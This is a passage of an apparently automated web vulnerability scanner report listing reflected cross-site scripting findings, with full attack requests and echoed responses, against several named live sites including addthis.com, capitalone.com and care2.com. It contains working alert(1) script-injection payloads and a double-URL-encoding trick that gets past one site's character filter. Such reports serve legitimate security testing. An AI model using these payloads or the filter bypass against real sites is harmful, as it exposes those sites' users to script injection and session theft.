GET /?&t202id=bng657cd"><script>alert(1)</script>8d46ffd6598&t202kw=news&c3=dp HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng657cd"><script>alert(1)</script>8d46ffd6598&t202kw=news&c3=dp" title="home"> ...[SNIP]...
The value of the c3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba1c"><script>alert(1)</script>03f461f4e52 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?&t202id=bng&t202kw=news&c3=dp1ba1c"><script>alert(1)</script>03f461f4e52 HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:58 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng&t202kw=news&c3=dp1ba1c"><script>alert(1)</script>03f461f4e52" title="home"> ...[SNIP]...
The value of the t202kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d84e"><script>alert(1)</script>35f0e42117f was submitted in the t202kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?&t202id=bng&t202kw=news7d84e"><script>alert(1)</script>35f0e42117f&c3=dp HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng&t202kw=news7d84e"><script>alert(1)</script>35f0e42117f&c3=dp" title="home"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead2b"-alert(1)-"1639121d17f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpead2b"-alert(1)-"1639121d17f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 08 Dec 2010 01:31:01 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=7sdiiv5o9au0qcn8gquiiejst1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpead2b"-alert(1)-"1639121d17f"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24144<script>alert(1)</script>db5e1533f31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php24144<script>alert(1)</script>db5e1533f31 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 08 Dec 2010 01:31:04 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=2msfjku5no4hifcf3m67uff9b7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php24144<script>alert(1)</script>db5e1533f31</strong> ...[SNIP]...
4.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d1f"-alert(1)-"c67c58fd361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/62d1f"-alert(1)-"c67c58fd361 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 87499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/62d1f"-alert(1)-"c67c58fd361"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fdf"><a>c3427942551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /members/Blogb2fdf"><a>c3427942551/JimGintonio HTTP/1.1 Host: www.azcentral.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:32:47 GMT Server: Apache X-Powered-By: PHP/5.3.1 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 35533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the linkid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca646"><a>91c2cd96a28 was submitted in the linkid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/interest-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646"><a>91c2cd96a28 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:33:31 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20927
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646"><a>91c2cd96a28" name="dest"> ...[SNIP]...
4.110. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ca6"><a>3b422ca6a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/interest-online-checking-account/index.php?19ca6"><a>3b422ca6a4f=1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20900
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php?19ca6"><a>3b422ca6a4f=1" name="dest"> ...[SNIP]...
4.111. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10989%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94c9ae6e12f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10989"><script>alert(1)</script>94c9ae6e12f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /directbanking/interest-online-checking-account/index.php/10989%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94c9ae6e12f HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20921
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php/10989"><script>alert(1)</script>94c9ae6e12f?" name="dest"> ...[SNIP]...
The value of the linkid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a6d3"><a>3fa9470107b was submitted in the linkid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/rewards-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_02_T_SP17a6d3"><a>3fa9470107b HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:33:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20923
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_02_T_SP17a6d3"><a>3fa9470107b" name="dest"> ...[SNIP]...
4.113. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42742%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e381a25200 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42742"><script>alert(1)</script>9e381a25200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /directbanking/rewards-online-checking-account/index.php/42742%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e381a25200 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 01:34:24 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20917
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php/42742"><script>alert(1)</script>9e381a25200?" name="dest"> ...[SNIP]...
4.114. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886ff"><a>d6272b7f5f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/rewards-online-checking-account/index.php?886ff"><a>d6272b7f5f7=1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 01:34:08 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20896
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php?886ff"><a>d6272b7f5f7=1" name="dest"> ...[SNIP]...
4.115. http://www.care2.com/news/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.care2.com
Path: /news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d8e38--><script>alert(1)</script>b3adf90cce7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/?d8e38--><script>alert(1)</script>b3adf90cce7=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml"><head><titl ...[SNIP]... <!--UID:www.care2.com://news/?d8e38--><script>alert(1)</script>b3adf90cce7=1--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26138"-alert(1)-"0ee04136db8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mercury26138"-alert(1)-"0ee04136db8?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:41:38 GMT
Server: Apache/2.2.3 (Red Hat)
